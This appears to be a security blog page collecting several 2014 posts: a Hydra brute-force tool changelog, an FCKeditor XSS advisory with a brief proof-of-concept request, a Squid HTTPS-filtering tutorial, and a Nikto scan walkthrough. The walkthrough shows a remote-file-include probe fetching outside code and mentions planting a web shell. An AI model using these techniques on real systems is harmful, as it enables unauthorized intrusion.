Remove/ Get Rid of Trojan.PWS.Panda.5661 Virus Thoroughly
Reviewed by 0x000216
on
Tuesday, June 03, 2014
Rating: 5
Hydra Network Logon Cracker 8.0 - Very fast network logon cracker which support many different services
A very fast network logon cracker which support many different services.
See feature sets and services coverage page - incl. a speed comparison against ncrack and medusa.Number one of the biggest security holes are passwords, as every password security study shows.
This tool is a proof of concept code, to give researchers and security consultants the possiblity to show how easy it would be to gain unauthorized access from remote to a system.
There are already several login hacker tools available, however none does either support more than one protocol to attack or support parallized connects.
It was tested to compile cleanly on Linux, Windows/Cygwin, Solaris, FreeBSD/OpenBSD, QNX (Blackberry 10) and OSX.
Currently this tool supports the following protocols:
Asterisk, AFP, Cisco AAA, Cisco auth, Cisco enable, CVS, Firebird, FTP, HTTP-FORM-GET, HTTP-FORM-POST, HTTP-GET, HTTP-HEAD, HTTP-PROXY, HTTPS-FORM-GET, HTTPS-FORM-POST, HTTPS-GET, HTTPS-HEAD, HTTP-Proxy, ICQ, IMAP, IRC, LDAP, MS-SQL, MYSQL, NCP, NNTP, Oracle Listener, Oracle SID, Oracle, PC-Anywhere, PCNFS, POP3, POSTGRES, RDP, Rexec, Rlogin, Rsh, SAP/R3, SIP, SMB, SMTP, SMTP Enum, SNMP v1+v2+v3, SOCKS5, SSH (v1 and v2), SSHKEY, Subversion, Teamspeak (TS2), Telnet, VMware-Auth, VNC and XMPP.
Changelog for hydra
-------------------
Release 8.0
! Development moved to a public github repository: https://github.com/vanhauser-thc/thc-hydra
* Added module for redis (submitted by Alejandro Ramos, thanks!)
* Added patch which adds Unicode support for the SMB module (thanks to Max Kosmach)
* Added initial interactive password authentication test for ssh (thanks to Joshua Houghton)
* Added patch for xhydra that adds bruteforce generator to the GUI (thanks to Petar Kaleychev)
* Target on the command line can now be a CIDR definition, e.g. 192.168.0.0/24
* with -M , you can now specify a port for each entry (use "target:port" per line)
* Verified that hydra compiles cleanly on QNX / Blackberry 10 :-)
* Bugfixes for -x option:
- password tries were lost when connection errors happened (thanks to Vineet Kumar for reporting)
- fixed crash when used together with -e option
* Fixed a bug that hydra would not compile without libssh (introduced in v7.6)
* Various bugfixes if many targets where attacked in parallel
* Cygwin's Postgresql is working again, hence configure detection re-enabled
* Added gcc compilation security options (if detected to be supported by configure script)
* Enhancements to the secure compilation options
* Checked code with cppcheck and fixed some minor issues.
* Checked code with Coverity. Fixed a lot of small and medium issues.
Hydra Network Logon Cracker 8.0 - Very fast network logon cracker which
support many different services
Reviewed by 0x000216
on
Tuesday, June 03, 2014
Rating: 5
Reviewed by 0x000216
on
Tuesday, June 03, 2014
Rating: 5
#FCKeditor 2.6.10 Cross Site Scripting #XSS
Class Cross-Site Scripting
Remote Yes
Published 2nd June 2014
Credit Robin Bailey of Dionach (vulns@dionach.com)
Vulnerable FCKeditor <= 2.6.10
FCKeditor is prone to a reflected cross-site scripting (XSS) vulnerability due to inadequately sanitised user input. An attacker may leverage this issue to run JavaScript in the context of a victim's browser.
FCKeditor 2.6.10 is known to be vulnerable; older versions may also be vulnerable.
Note that this issue is related to CVE-2012-4000, which was a cross-site scripting vulnerability in the values of the textinputs[] array passed to the spellchecker.php page. To resolve this issue the values of this array were encoded with htmlspecialchars() before being output to the page; however the array keys were still echoed unencoded.
PoC:
POST http://[target]/editor/dialog/fck_spellerpages/spellerpages/server-scripts/spellchecker.php
textinputs[1]=zz The vendor was notified of this issue, and FCKeditor 2.6.11 was released to address this vulnerability. See the following vendor announcement: http://ckeditor.com/blog/FCKeditor-2.6.11-Released Timeline: 28/05/2014 Vulnerability identified 28/05/2014 Initial vendor contact 28/05/2014 Vendor response to contact 28/05/2014 Vulnerability disclosed to vendor 29/05/2014 Vendor confirms vulnerability 02/06/2014 Vendor releases patch 02/06/2014 Public disclosure of vulnerability ______________________________________________________________________ Disclaimer: This e-mail and any attachments are confidential. It may contain privileged information and is intended for the named addressee(s) only. It must not be distributed without Dionach Ltd consent. If you are not the intended recipient, please notify the sender immediately and destroy this e-mail. Any unauthorised copying, disclosure or distribution of the material in this e-mail is strictly forbidden. Unless expressly stated, opinions in this e-mail are those of the individual sender, and not of Dionach Ltd. Dionach Ltd, Greenford House, London Road, Wheatley, Oxford OX33 1JH Company Registration No. 03908168, VAT No. GB750661242 ______________________________________________________________________
#FCKeditor 2.6.10 Cross Site Scripting #XSS
Reviewed by 0x000216
on
Tuesday, June 03, 2014
Rating: 5
Reviewed by 0x000216
on
Tuesday, June 03, 2014
Rating: 5
#Truecrypt is #alive and well and living in #Switzerland
Encryption software product Truecrypt apparently has been revived, days after having been declared dead under mysterious circumstances.
Last Thursday, a notice appeared on the Truecrypt Sourceforge webpage that said, "WARNING: Using Truecrypt is not secure as it may contain unfixed security issues. This page exists only to help migrate existing data encrypted by Truecrypt." It advised users to migrate to built-in encryption.
However, another webpage based in Switzerland appeared over the weekend, with the banner "Truecrypt must not die", promising that it would ensure that the product has a future, and linking to an article in which security expert Steve Gibson confirms that he still believes in the safety of Truecrypt.
The decision to shutter the Truecrypt project was met with surprise, with some assuming that it was the result of a hacking attack. Gibson's post, however suggests that the developers, having discovered flaws during ongoing auditing, decided to shut the project down rather than fix it.
In a scathing dig at the decision, Gibson told readers, "But that's not the way the internet works. Having created something of such enduring value, which inherently requires significant trust and buy-in, they are rightly unable to now take it back. They might be done with it, but the rest of us are not."
The new website includes the download links removed from Sourceforge, along with a first for Truecrypt - a list of contributors, where previously they had guarded their identities.
The new website is hosted in Switzerland in the hope of avoiding any legal attacks from former developers or customers, allowing the new Truecrypt to fork away from its prior incarnation.
#Truecrypt is #alive and well and living in #Switzerland
Reviewed by 0x000216
on
Tuesday, June 03, 2014
Rating: 5
Reviewed by 0x000216
on
Tuesday, June 03, 2014
Rating: 5
Remove/ Delete Worm:Win32/Vobfus.AAJ Virus and Protect the PC
Reviewed by 0x000216
on
Tuesday, June 03, 2014
Rating: 5
Remove/ Delete Adware:win32/Fidot Virus and Stop Ads
Reviewed by 0x000216
on
Tuesday, June 03, 2014
Rating: 5
#Howto Filter #HTTPS Traffic with #Squid 3 on #UbuntuServer
This article will tell you how to compile, setup and configure Squid proxy capable of filtering encrypted HTTPS connections using Diladele Web Safety ICAP content filtering server. Being able to look into HTTPS contents greatly increases your ability to control what is allowed and accepted within your network while keeping inappropriate contents away.
Why do We Need to Filter HTTPS
HTTPS protocol was designed to provide secure means of communications between internet browser and remote web servers. In order to achieve this goal HTTPS protocol encrypts data passing through established connections so that it cannot be decrypted in reasonable amount of time thus preventing anyone from sniffing the contents interchanged over this connection. This protocol was primarily invented to enable safe and secure communication between the user and financial sites or government institutions over the insecure medium such as the Internet.
Recently more and more web sites started to use HTTPS encrypted communications to increase online privacy of users. Google who as first enabled HTTPS for all its searches by default probably initiated this trend. Although there are no doubts that HTTPS encryption is a good thing for safety on the wire we must take into account that it also creates several problems for controlled networks typically found at home or offices. The main problem here is the essence of the HTTPS protocol itself – no one except the browser and the web server is able to see and thus filter transferred data. This may not always be desired. Contents that are usually blocked suddenly become immediately accessible by anyone. As an example imagine a school network where minors can see questionable content by just mistyping a search term in Google. Moreover the law often forces administrators in educational institutions to block access to such content (e.g. CIPA for educational environments) and encrypted access to web sites makes it nearly impossible to fulfill such an obligation.
In order to overcome these limitations it is advised to setup HTTPS filtering of web contents with help of SSL bump feature of Squid proxy server and Diladele Web Safety web filter.
How It Works
In order to filter web requests user’s browser needs to be explicitly directed to use the proxy that is deployed in the same network. It is also possible to set the transparent proxy but we are not going to explain how this is done in this tutorial because steps involved are quite different from explicit proxy setup.
When a user tries to navigate to a web site, browser sends the request to proxy server, asking it to get the requested page on his behalf. The proxy establishes a new connection to the remote site and returns the response to browser. If normal HTTP is used then proxy is able to see the original contents of the response and filter it. In case of HTTPS the flow of data is a little different. Browser asks the proxy to establish a virtual tunnel between itself and remote server and then sends encrypted data through the proxy. Domain name to which a virtual tunnel is being established is usually known, so proxy is able to block this virtual tunnel when it finds out that domain name belongs to a prohibited category. Unfortunately this is not a complete solution as there are a lot of sites on the Internet which are general in nature (like Google or YouTube) but allow you to easily navigate to something undesired.
To improve the quality of web filtering and get access to contents in encrypted connections, browsers in the network may be setup to trust proxy to act on their behalf for establishing HTTPS connections, filtering them and passing the allowed data to clients while blocking everything that is not allowed. Although this assumption is too strict to be implemented in public networks, it is easily doable in controlled home, educational or corporate environments where administrators act as sole owners of network devices and may force any trusting rules. After established trust browser is able to ask proxy to connect to a remote site in a safe manner with HTTPS, proxy is able to decrypt the traffic, filter it, encrypt it again and pass it to browser. As browser trusts the proxy it continues working with filtered HTTS without any errors or warnings.
Unfortunately most of the Squid versions included in most common Linux/FreeBSD distributions do not contain compile switches necessary for successful HTTPS filtering. Proxy administrator needs to recompile Squid proxy, reinstall and reconfigure it with additional list of options. Although this process is not very complex, it is complex enough and it would be helpful to have all the necessary steps exactly described. We will provide such exact instructions for the latest version of one of the most popular Linux distributions – Ubuntu Server 13.10.
Build Squid with SSL Bump and ICAP Client
Before compiling it is considered a good practice to bring the operation system to a most recent state. This can be done by running the following commands in the terminal.
sudo apt-get update && sudo apt-get upgrade && sudo rebootIn order to build the Squid from source we need to install some build tools and fetch the sources of Squid and various dependent packages from Ubuntu repository. This does not need to take place on the production server, it is possible to build Squid on one machine and install the resulting binaries on others.
sudo apt-get install devscripts build-essential fakeroot libssl-devsudo apt-get source squid3sudo apt-get build-dep squid3Running the following command unpacks Squid source package together with all system integration scripts and patches provided by Ubuntu developers.
dpkg-source -x squid3_3.3.8-1ubuntu3.dscSources are unpacked into squid3-.3.8 folder. We need to set this folder as current and modify configure options in debian/rules to include compiler switches (–enable-ssl and –enable-ssl-crtd) necessary for HTTPS filtering.
patch squid3-3.3.8/debian/rules < rules.patchThe rules.patch file should look like this.
--- rules 2013-11-15 11:49:59.052362467 +0100
+++ rules.new 2013-11-15 11:49:35.412362836 +0100
@@ -19,6 +19,8 @@
DEB_CONFIGURE_EXTRA_FLAGS := --datadir=/usr/share/squid3 \
--sysconfdir=/etc/squid3 \
--mandir=/usr/share/man \
+ --enable-ssl \
+ --enable-ssl-crtd \
--enable-inline \
--enable-async-io=8 \
--enable-storeio="ufs,aufs,diskd,rock" \One file in source code of Squid Proxy needs to be adjusted too (src/ssl/gadgets.cc). This change is needed to prevent Firefox error sec_error_inadequate_key_usage that usually occurs when doing HTTPS filtering with latest Firefox browsers. If you use only Google Chrome, Microsoft Internet Explorer or Apple Safari this step is not required.
Download patches here
patch squid3-3.3.8/src/ssl/gadgets.cc < gadgets.cc.patchWhere gadgets.cc.patch looks like this.
--- gadgets.cc 2013-07-13 09:25:14.000000000 -0400
+++ gadgets.cc.new 2013-11-26 03:25:25.461794704 -0500
@@ -257,7 +257,7 @@
mimicExtensions(Ssl::X509_Pointer & cert, Ssl::X509_Pointer const & mimicCert)
{
static int extensions[]= {
- NID_key_usage,
+ //NID_key_usage,
NID_ext_key_usage,
NID_basic_constraints,
0Then we build the package using the following command. After a while this command builds all required *.DEB packages.
cd squid3-3.3.8 && dpkg-buildpackage -rfakeroot -bInstall Diladele Web Safety
SSL Bumpng feature alone is not enough to block questionable web content. We also need the filtering server that could be paired with Squid. We will use Diladele Web Safety (DDWS) formerly known as QuintoLabs Content Security for the filtering and blocking part. It is an ICAP daemon capable of integrating existing Squid proxy and providing rich content filtering functionality out of the box. It may be used to block illegal or potentially malicious file downloads, remove annoying advertisements, prevent access to various categories of the web sites and block resources with explicit content.
We will use version 3.0 of qlproxy that is in release candidate state and will probably be finally released this month. It was designed specifically with HTTPS filtering in mind and contains rich web administrator console to perform routine tasks right from the browser.
By default, DDWS comes with four polices preinstalled. Strict policy contains web filter settings put on maximum level and is supposed to protect minors and K12 students from inappropriate contents on the Internet. Relaxed policy blocks only excessive advertisements and was supposed to be used by network administrators, teachers and all those who do not need filtered access to web but would like to evade most ads. Third policy is tailored to white list only browsing and the last group contains less restrictive web filtering settings suitable for normal web browsing without explicitly adult contents shown.
In order to install Diladele Web Safety for Squid Proxy, download package for Ubuntu 13.10 from Diladele B.V. web site athttp://www.quintolabs.com using browser or just run the following command in terminal.
wget http://updates.diladele.com/qlproxy/binaries/3.0.0.3E4A/amd64/release/ubuntu12/qlproxy-3.0.0.3E4A_amd64.debAdministration console of Diladele Web Safety is built using Python Django framework and is usually managed by Apache web server. To install packages required for correct functioning of web UI run the following commands in the terminal.
sudo apt-get install python-pipsudo pip install django==1.5sudo apt-get install apache2 libapache2-mod-wsgiInstall the DEB package and perform integration with Apache by running the following commands.
sudo dpkg --install qlproxy-3.0.0.3E4A_amd64.debsudo a2dissite 000-defaultsudo a2ensite qlproxysudo service apache2 restartPlease note you may need to uncomment the #Require all granted line in /etc/apache2/sites-available/qlproxy.conf if you get Access Denied errors trying to access Diladele Web Safety’s Web UI. This is due to the fact that Apache configuration settings have changed between Ubuntu 12 and Ubuntu 13. Luckily has to be done only once.
Configure Squid for ICAP Filtering and HTTP Bumping
The Squid packages we have compiled previously need to be installed on the system. To perform installation run the following commands.
sudo apt-get install ssl-certsudo apt-get install squid-langpacksudo dpkg --install squid3-common_3.3.8-1ubuntu3_all.debsudo dpkg --install squid3_3.3.8-1ubuntu3_amd64.debsudo dpkg --install squidclient_3.3.8-1ubuntu3_amd64.debIn order to recreate original SSL certificates of the remote web sites during HTTPS filtering Squid uses a separate process named ssl_crtd that needs to be configured like this.
sudo ln -s /usr/lib/squid3/ssl_crtd /bin/ssl_crtdsudo /bin/ssl_crtd -c -s /var/spool/squid3_ssldbsudo chown -R proxy:proxy /var/spool/squid3_ssldbFinally, modify Squid configuration file in /etc/squid3/squid.conf to integrate it with Diladele Web Safety as ICAP server. Due to the size of the patch file it’s text not included into the article directly but is part of the download archive.
sudo cp /etc/squid3/squid.conf /etc/squid3/squid.conf.defaultsudo patch /etc/squid3/squid.conf < squid.conf.patchsudo /usr/sbin/squid3 -k parseFrom now on Squid is capable of HTTPS filtering and we may continue filtering adjustments from Web UI of Diladele Web Safety.
Navigate to http:/// and login with default name root and password P@ssw0rd. Select Settings / HTTPS Filtering / Filtering Mode. Diladele Web Safety may either filter specific HTTPS sites or all of them with exclusions. Total filtering is more tailored to providing very safe network environments.
Select the desired mode, click Save Settings, add target domains or exclusions as you like and then restart ICAP server by clicking on the green button in the top right corner as indicated on the following screenshots.
Run the following command in terminal on the proxy.
sudo service squid3 restartNavigate to google.com and see that HTTPS filtering is indeed active. The following warning shows that Squid was able to bump the SSL connection, filtered it and encrypted in again using Diladele Web Safety’s generated certificate.
In order to get rid of these warnings, we must install the myca.der certificate file from into the browser and mark it as trusted. Again navigate to http://. Select Settings / HTTPS Filtering / Certificates and select the one that matches your operating system or device. Instructions on how to install the certificate in each operating system or device is slightly different, the following screens show how to install the DER file in the Apple iPad and Microsoft Internet Explorer. For other devices please take a look at Online Documentation of Diladele Web Safety.
Reopen your browser, navigate to Google and make sure the certificate warning is away. If you click on the lock icon in the internet address box then it clearly indicates the google.com was signed by proxy’s certificate and not by original certificate by google.
If you try to search Google with some adult only terms (e.g. NSFW) Diladele Web Safety blocks the access to explicit contents showing its denied page.
Please be sure to change the default certificates that come with installation package of Diladele Web Safety to something more unique for your network. For instructions on how to regenerate your own certificates for this purpose consult Online Documentation of Diladele Web Safety.
Resume
Now we have HTTPS web filtering up and running and our network environment become a little safer for those who need protection at most. Next steps would be direct all clients browsers to use Squid proxy, regenerate the default proxy certificates, setup authentication and authorization to get user specific reports in Diladele Web Safety, integrate it with e.g. Active Directory using Squid’s support for Kerberos authentication and optionally setup transparent HTTPS filtering. It is also advisable to setup the caching DNS server on Squid proxy to further increase speed of connections.
Link Reference
- Diladele B.V. web site at http://www.quintolabs.com
- Online Documentation of Diladele Web Safety
- Squid Proxy Wiki on SSL Bumping
- Ubuntu Server 13.10.
#Howto Filter #HTTPS Traffic with #Squid 3 on #UbuntuServer
Reviewed by 0x000216
on
Tuesday, June 03, 2014
Rating: 5
Reviewed by 0x000216
on
Tuesday, June 03, 2014
Rating: 5
Pentesting Web Servers with Nikto in Backtrack and Kali Linux
Nikto is one of the most popular web security application when you are beginning a web pentesting project.
You can download Nikto from http://cirt.net/nikto2 This tool has been included in Backtrack and Kali Linux distributions.
Nikto is an Open Source web server scanner. This tool performs test against web servers making requests for multiple items. Nikto checks:
We are going to run Nikto against a server.
As you can see, we have find out the Server and PHP versions and a lot of interesting folders.
We have discover a RFI (Remote File Include) on this server...
This URL path get a PHP code from http://cirt.net/rfiinc.txt? with the next code:
This code executes "phpinfo" but if you want, you can upload a web shell in order to gain access to the server.
Next line is interesting too. Nikto has located some URLs where you could upload files with your own source code.
Nikto is one of the first applications that I run when a client request me a web audit.
You can download Nikto from http://cirt.net/nikto2 This tool has been included in Backtrack and Kali Linux distributions.
Nikto is an Open Source web server scanner. This tool performs test against web servers making requests for multiple items. Nikto checks:
- Over 6500 dangerous files/CGIs.
- More than 1250 outdated version for several web servers.
- Specific problems on over 270 servers.
- Presence of index files.
- HTTP server options like TRACE.
- Installed software and web servers.
Nikto creates a lot of requests quickly, is not designed as an overly stealthy tool. If you run Nikto against a remote Web Server, the administrator could read a lot of lines on web server log which show the attack. Some SIEMs have defaults rules for correlating these logs and it could create an alarm warning to the administrators about the attack.
These are the Nikto options.
These are the Nikto options.
jnieto@naltor:~$ nikto
Option host requires an argument
-config+ Use this config file
-Cgidirs+ scan these CGI dirs: 'none', 'all', or values like "/cgi/ /cgi-a/"
-dbcheck check database and other key files for syntax errors
-Display+ Turn on/off display outputs
-evasion+ ids evasion technique
-Format+ save file (-o) format
-host+ target host
-Help Extended help information
-id+ Host authentication to use, format is id:pass or id:pass:realm
-list-plugins List all available plugins
-mutate+ Guess additional file names
-mutate-options+ Provide extra information for mutations
-output+ Write output to this file
-nocache Disables the URI cache
-nossl Disables using SSL
-no404 Disables 404 checks
-port+ Port to use (default 80)
-Plugins+ List of plugins to run (default: ALL)
-root+ Prepend root value to all requests, format is /directory
-ssl Force ssl mode on port
-Single Single request mode
-timeout+ Timeout (default 2 seconds)
-Tuning+ Scan tuning
-update Update databases and plugins from CIRT.net
-vhost+ Virtual host (for Host header)
-Version Print plugin and database versions
+ requires a value
Note: This is the short help output. Use -H for full help.
We are going to run Nikto against a server.
jnieto@naltor:~$ nikto -h www.XxXxXxXxXx.es
- Nikto v2.1.4
---------------------------------------------------------------------------
+ Target IP: XXX.XXX.XXX.XXX
+ Target Hostname: www.XxXxXxXxXx.es
+ Target Port: 80
+ Start Time: 2013-06-19 16:23:35
---------------------------------------------------------------------------
+ Server: Apache/2.2.22 (Win32) PHP/5.3.1
+ Retrieved x-powered-by header: PHP/5.3.1
+ robots.txt contains 10 entries which should be manually viewed.
+ ETag header found on server, inode: 1688849860445366, size: 1028, mtime: 0x49b5cedbf3834
+ Multiple index files found: index.php, index.html,
+ PHP/5.3.1 appears to be outdated (current is at least 5.3.5)
+ DEBUG HTTP verb may show server debugging information. See http://msdn.microsoft.com/en-us/library/e8z01xdh%28VS.80%29.aspx for details.
+ OSVDB-877: HTTP TRACE method is active, suggesting the host is vulnerable to XST
+ Default account found for 'Acceso restringido a usuarios autorizados' at /webalizer/ (ID '', PW '_Cisco'). Cisco device.
+ OSVDB-12184: /index.php?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-3092: /datos/: This might be interesting...
+ OSVDB-3092: /ftp/: This might be interesting...
+ OSVDB-3092: /imagenes/: This might be interesting...
+ OSVDB-3092: /img/: This might be interesting...
+ OSVDB-3092: /README.TXT: This might be interesting...
+ OSVDB-3092: /readme.txt: This might be interesting...
+ OSVDB-3092: /temp/: This might be interesting...
+ OSVDB-3092: /tmp/: This might be interesting...
+ OSVDB-3233: /info.php: PHP is installed, and a test script which runs phpinfo() was found. This gives a lot of system information.
+ OSVDB-3093: /FCKeditor/editor/filemanager/upload/test.html: FCKeditor could allow files to be updated or edited by remote attackers.
+ OSVDB-3093: /FCKeditor/editor/dialog/fck_image.html: FCKeditor could allow files to be updated or edited by remote attackers.
+ OSVDB-3093: /FCKeditor/editor/filemanager/browser/default/connectors/test.html: FCKeditor could allow files to be updated or edited by remote attackers.
+ OSVDB-3093: /FCKeditor/editor/dialog/fck_flash.html: FCKeditor could allow files to be updated or edited by remote attackers.
+ OSVDB-3093: /FCKeditor/editor/dialog/fck_link.html: FCKeditor could allow files to be updated or edited by remote attackers.
+ OSVDB-3093: /FCKeditor/editor/filemanager/browser/default/connectors/asp/connector.asp: FCKeditor could allow files to be updated or edited by remote attackers.
+ OSVDB-3092: /INSTALL.txt: Default file found.
+ OSVDB-5292: /info.php?file=http://cirt.net/rfiinc.txt?: RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/
+ OSVDB-3092: /install.txt: Install file found may identify site software.
+ OSVDB-3092: /INSTALL.TXT: Install file found may identify site software.
+ OSVDB-3093: /FCKeditor/editor/filemanager/browser/default/frmupload.html: FCKeditor could allow files to be updated or edited by remote attackers.
+ OSVDB-3093: /FCKeditor/fckconfig.js: FCKeditor JavaScript file found.
+ OSVDB-3093: /FCKeditor/editor/filemanager/browser/default/browser.html: FCKeditor could allow files to be updated or edited by remote attackers.
+ 6448 items checked: 10 error(s) and 31 item(s) reported on remote host
+ End Time: 2013-06-19 16:27:19 (224 seconds)
---------------------------------------------------------------------------
As you can see, we have find out the Server and PHP versions and a lot of interesting folders.
We have discover a RFI (Remote File Include) on this server...
+ OSVDB-5292: /info.php?file=http://cirt.net/rfiinc.txt?: RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/
This URL path get a PHP code from http://cirt.net/rfiinc.txt? with the next code:
This code executes "phpinfo" but if you want, you can upload a web shell in order to gain access to the server.
Next line is interesting too. Nikto has located some URLs where you could upload files with your own source code.
+ OSVDB-3093: /FCKeditor/editor/filemanager/upload/test.html: FCKeditor could allow files to be updated or edited by remote attackers.
Nikto is one of the first applications that I run when a client request me a web audit.
Pentesting Web Servers with Nikto in Backtrack and Kali Linux
Reviewed by 0x000216
on
Tuesday, June 03, 2014
Rating: 5
Reviewed by 0x000216
on
Tuesday, June 03, 2014
Rating: 5





